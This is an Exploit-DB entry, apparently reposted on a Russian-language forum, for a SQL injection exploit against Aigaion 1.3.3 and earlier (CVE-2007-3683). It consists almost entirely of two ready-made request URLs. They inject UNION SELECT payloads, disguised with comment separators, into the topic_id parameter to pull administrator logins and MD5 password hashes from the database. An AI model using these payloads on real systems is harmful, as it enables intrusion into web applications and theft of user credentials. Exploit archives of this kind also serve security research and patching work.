- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4164
- Проверка EDB
-
- Пройдено
- Автор
- CYPHERXERO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3683
- Дата публикации
- 2007-07-09
Код:
--==+================================================================================+==--
--==+ Aigaion <= 1.3.3 SQL Injection Exploit +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash
WEBSITE: http://www.cypherxero.net
Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--
EXPLOITS:
http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,CONCAT(login,CHAR(58),password),null/**/FROM/**/person/**/WHERE/**/ID=1--
http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,password,null/**/FROM/**/person--
# milw0rm.com [2007-07-09]- Источник
- www.exploit-db.com
